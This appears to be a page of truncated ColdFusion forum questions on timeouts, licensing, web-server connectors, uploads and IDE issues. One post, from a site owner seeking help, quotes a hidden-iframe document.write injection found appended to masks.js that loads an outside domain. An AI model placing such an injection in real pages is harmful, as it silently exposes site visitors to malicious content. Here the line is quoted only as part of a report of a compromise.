The official community for ColdFusion.
Recently active
I have a script that is pulling in data from an excel document using cfspreedsheet, performing data checks, and inserting the data into the appropriate tables. Each XLS document only has about 1000 records. The scripts are wrapped in a CFTransaction tag to ensure rollback if the script errors.When I run these scripts they will succeed if I'm only importing around 400 records or less. If I try to import any more than that I receive a 500 server error from IIS. I'm guessing that this is some sort of timeout issue. In order to try and force the success of the script, I upped the requesttimeout setting to 900000. This did not solve the problem.Can anyone tell me how to troubleshoot and/or fix this problem?<cfsetting requesttimeout="900000" showdebugoutput="true"&
Ok so I knwo how hold Coldfusion MX 7 is and that there is no official support from adobe anymore, but unfortunately a client I am working with has a Coldfusion MX 7.0 server and they do not want to upgrade. I would like to at least get all the available hotfixes and updates installed for them but I cant seem to find the downloads for them anywhere. Does anyone knwo where I can get these?
I want to create a sub folder at run time and want to use cfdirectory to create new diretory.I do not see override option on the cfdirectory tag, it seems that I need to use FileExists to check before create,Please let me know if I am wrong,Your information and help is great appreciated,regards,Iccsi,
Folks,How do I to know file size in an image file before upload?I have a form and these can only accept image files with until 2mb, and jpg extension.Anyone have a tip for this?tksFabiano Magno Pechibella
Ok, I give up. So soon? So I am using cflayout, cflayoutarea stuff. And in my code I have a bug. But I can't find it. Why? Because CF10 is not showing it to me. It is hidden. Normally when outside a cflayout (or sometimes in one) instead of getting the huge usual error listing all over your screen, instead I get a sort of pop up window ... Error retriving markup for element "element name": and the element name is the tab ... I am using nested cflayouts. enable debugging by adding cfdebug to the URL. When I do that all I get is a red line telling me nothing else. How does one determine what the problem is under such a scenario?
This question was posted in response to the following article: http://help.adobe.com/en_US/ColdFusion/9.0/CFMLRef/WSc3ff6d0ea77859461172e0811cbec22c24-7a23.html
Long story short, we are installing Groupwise WebAccess on our ColdFusion 10 web server to offer webmail, and it is hard-coded to use the jakarta directory for it's own ISAPI_redirect.dll. ColdFusion was installed and integrated into IIS 7.5 rather than set to run standalone.I'm not sure if the underlying Tomcat services that ColdFusion installs are being utilized, but I know that it requires the jakarta folder to run CF. So is it possible to configure somewhere in CF's files a different name of this virtual directory? I could create a cf-jakarta and map it to CF's ISAPI_redirect.dll file and this should not conflict with WebAccess' need for it's own ISAPI_redirect.dll.
I have upgraded My coldfusion 9 to use 64 bit JDK rather than 32 bit. But it still says 32 .When I try to get informtion through server variable.sun.arch.data.model 32 sun.boot.class.path /data/www/jdk/jdk1.5.0_14_64bit/jre/lib/rt.jar:/data/www/jdk/jdk1.5.0_14_64bit/jre/lib/i18n.jar:/data/www/jdk/jdk1.5.0_14_64bit/jre/lib/sunrsasign.jar:/data/www/jdk/jdk1.5.0_14_64bit/jre/lib/jsse.jar:/data/www/jdk/jdk1.5.0_14_64bit/jre/lib/jce.jar:/data/www/jdk/jdk1.5.0_14_64bit/jre/lib/charsets.jar:/data/www/jdk/jdk1.5.0_14_64bit/jre/classes Jrun Version 4.0Coldfusion 9.0SunOS 5.10 Generic_142900-02 sun4v sparc SUNW,T5140Thanks
This question was posted in response to the following article: http://help.adobe.com/en_US/ColdFusion/9.0/CFMLRef/WSAC308487-F029-4f89-BAFB-B410E145E86E.html
I use following code to have upload file contorols on the form.I has a button which has caption "choose file" on the left and have a label to show file name when user select the file.I want to have Browse caption on the button and to have the button on the right side and to have a text box to store file name text.I would like to know if it possible to use any property or attibute to configure, if not, then the only solution I need to use JavaScript to configure my controls.Your information and help is great appreciated,Regards,Iccsi,<cfif isdefined("form.submit_upload")><cffile action="UPLOAD" filefield="file_path" destination="Mypath" nameconflict="MAKEUNIQUE">File Uploaded!</cfif> <cfform action="fileupload1.cfm" method="POST" name="frmupload" enctype="multipart/form-data"><cfinput type="file" name="file_path" id="Browser" value="Browser"><br /><cfinput type="submit" name="submit_upload" value="upload"></cfform>
I am currently trying to learn CF10, Originally I installed the standalone developer edition, recently I decided to go ahead with the enterprise edition. My issue is that when I go to system info to update my license it applies it & saves but yet it still shows developer edition.I also tried a clean install, I still got no results.Am I missing some setting or critical step that needs to be done in order to get it in enterprise mode? I already validated and registered my license so I know that is ruled out. Any ideas? suggestions? I am in dire straits over this
Hi Folks,Here I am, one more time to ask the gurus how create graphics with the tag cfchart to mobile application.Anyone know or would developed some app this type?Hugs from BrazilFabiano Magno Pechibella
I'm currently running ColdFusion Version 8. we are in the process of purchasing "Adobe Coldfusion Enterprise 10 Platinum Annual Support Subscription" will that cover the upgrades and updates to the latest version of ColdFusion?
We are getting aCould not initialize class coldfusion.monitor.event.RequestMonitorEventProcessor error. We cannot access the CF Administrator either. We are running CF 9.0 Standard Edition on Windows 2003. Trace below.It seems that CF is trying to start a service that is not enabled for the Standard Edition. My questions:1. Is my hunch above correct?2. Is there a way to remedy this issue without accessing the CF Administrator?Thanks all!Error and trace:java.lang.NoClassDefFoundError: Could not initialize class coldfusion.monitor.event.RequestMonitorEventProcessor at coldfusion.monitor.event.MonitoringServletFilter.doFilter(MonitoringServletFilter.java:38) at coldfusion.bootstrap.BootstrapFilter.doFilter(BootstrapFilter.java:46) at jrun.servlet.FilterChain.doFilter(FilterChain.java:94) at jrun.servlet.FilterChain.service(FilterChain.java:101) at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106) at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42) at jrun.servl
Here is how to reproduce the issue.Platform: Redhat Linux 6Step 1: Install Apache HTTPD 2.2.24 in /web/httpd, use the normal port 80Step 2: Install CF 10 in /web/coldfusion10 and connect it with Apache installation in step 1Step 3: Install another Apache HTTPD 2.2.24 in /web/httpd_82 and using port 82Step 4: Run "cf_root/runtime/bin/wsconfig ws apache -dir /web/httpd_82/conf -v" to connect Apache installation in step 3 with CF 10Step 5: Create "test.cfm" file in /web/httpd_82/htdocs, and add this statement to the file "<cfoutput> #CGI.SERVER_PORT# </cfoutput>With a browser, go to this url http://mywebserver:82/test.cfm. The expected output is "82", but the it shows "80. CF 8 does not have this issue.I've installed hotfix update 11, but the issue still persists.Thanks for any help.
Hi,I am succesfully storing away into the database each individuals cgi.http_user_agent.What a want to do is chop out the browser/platform and version number from the string and display it in a cfgraph for stat puposes. Is there any easy way of doing this?Does somebody have a function I can look at/use? Many thanks,George
We just found an injection at the end of masks.jsHere is the content that was added:"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");"Not sure what to make out of it. We have a very cryptic password known only to 2 people. Hacking the server would be pretty difficult so I assume somehow hacking into CFIDE was the issue. Anybody seen anything similar?It must have happened August 31, 2013We are using CF 9.02 with ....lib/updates/hf902-00003.jarThanks for any feedback and advice how to prevent another oneRob
I have a POST form and action to itself lie following: <cfform name="Indexform" method="post" action="index.cfm">I want to give user complete message when POST complete and show error message if there is any.I want to use on Button click, but it seems that it is too early.It should handle by server side, since it needs get back from server for POST. <td><input name="Submit" type="submit" id="Submit" value="Submit" onClick="PostMessage()"/></td>I would like to use ColdFusion.CreateMessage or CFMessagebox to show user message. Are there any condition I can check using CFIF to generate this user message? Your help and information is great appreciated,Regards,Iccsi,
I have a table that lists a class schedule and a table for people who register for a class. I use a query to populate the cfselect drop-down. My question is: Can I pass fields from the session query into the registration table when the form submits??? Thank you:) <cfquery name="session" datasource="webadmin"> SELECT Class, date1, date2, location, message from mobilitySchedule where dropDate >= Now() order
I'm using CF Builder (not 2) on Apache 2.2 with CF9.My project is set up just fine. I have Firefox and IE tabs set up in the IDE for previewing.When I preview a cfm project in my project, the correct behavior for my site is to first require a login page to be rendered in the preview window. After supplying uname/pw, the page I'm intending to preview *should* appear.This correct behavior happens on the IE preview. For the Firefox preview, the login page appears but then immediately after the login page is submitted, CF Builder completely closes. Poof! No error message or anything...it just shuts down.Any thoughts about what might be causing this FIrefox-only, only-after-login-is-submitted shutdown? I've uninstalled/reinstalled CF Builder, cleaned out project settings, and even reinstalled CF9. Nothing has changed this behavior.Help greatly appreciated!Les
I have been running CF Builder 2 on Mac OS 10.8.4 as a standalone. I can preview templates in Safari and Chrome but not in Firefox (v23). If I set Firefox as default browser in CFB2 prefs and preview a template, FF starts up and displays correctly once but any subsequent requests give me the alert "Close Firefox. A copy of Firefox is already open. Only one copy of Firefox can be open at a time." I have Googled this and tried deleting lock files and profiles etc. But I doubted this was the problem any way since Dreamweaver, Aptana Studio and Eclipse with CFEclipse plug-in all launch templates in FF successfully.So I tried uninstalling all CFB2 and all of Eclipse 4.2 and installed Eclipse 3.7.2 and CFB2 plug-in... same problem, CF Builder won't play with Firefox.Any answers?Many thanks.
I ran malwarebytes last night, and found my Coldfusion 9 shows jnbridge\uninstall\uninstaller.jar and uninstall\uninstaller.jar infected with backdoor.MSIL.pDoes anyone know Is this a false positive or should I go ahead and remove these.. guess worst case I won't be able to uinstall I suppose..
I have an coldfusion application in production. I am getting more and more requests for certain functions to be available in a mobile friendly format. I do not need the entire site to be mobile friendly, just certain parts. I have researched and determined how to detect the devices and how to redirect mobile users. 2 questions:1. What is the typical architecture for what I am needing. For example....currently I have:webroot/mycfappShould I do this?: webroot/mycfapp/mycfmobileapp Just add a subfolder? I am wanting to keep using the original authentication and other processes from mycfapp, but just have a section seperated that includes the mobile features.What is a light weight accepted way to do this? I typically develop desktop apps so this is new for me.2. Where should I store the variable that tells the application which format(desktop or mobile)? Should I keep that flag or variable in a session variable or cookie?It seems
I am wanting to document my web application with online docs. I have written some docs in pdf and posted them, but I would prefer to have an online version where I can update them easier. It will be text, table of contents, screenshots, etc. What is an easy lightweight to accomplish this?
enterprise edition changed to developer edition all of a suddenKindly find below in for maion got from logs07/29 09:44:32 INFO License Service: Flex 1.5 CF Edition enabled07/29 09:44:32 INFO Starting Flex 1.5 CF Edition07/29 09:44:33 Information [main] - Enterprise Edition enabled07/29 09:46:01 INFO License Service: Flex 1.5 CF Edition enabled07/29 09:46:01 INFO Starting Flex 1.5 CF Edition07/29 09:46:02 Information [main] - Enterprise Edition enabled07/30 12:09:25 INFO License Service: Flex 1.5 CF Edition enabled07/30 12:09:25 INFO Starting Flex 1.5 CF Edition07/30 12:09:26 Information [main] - Evaluation Edition enabled07/30 12:10:18 INFO License Service: Flex 1.5 CF Edition enabled07/30 12:10:18 INFO Starting Flex 1.5 CF Edition...08/20 15:11:04 INFO License Service: Flex 1.5 CF Edition enabled08/20 15:11:04 INFO Starting Flex 1.5 CF Edition08/20 15:11:06 Information [main] - Evaluation Edition enabled09/03 10:16:54 INFO License Service: Flex 1.5 CF Edition enabled09/03 10:16:54 INF
Remix with Firefly Community Gallery
Thousands of free creations to fall in love with and remix in Firefly.
Already have an account? Login
No account yet? Create an account
Enter your E-mail address. We'll send you an e-mail with instructions to reset your password.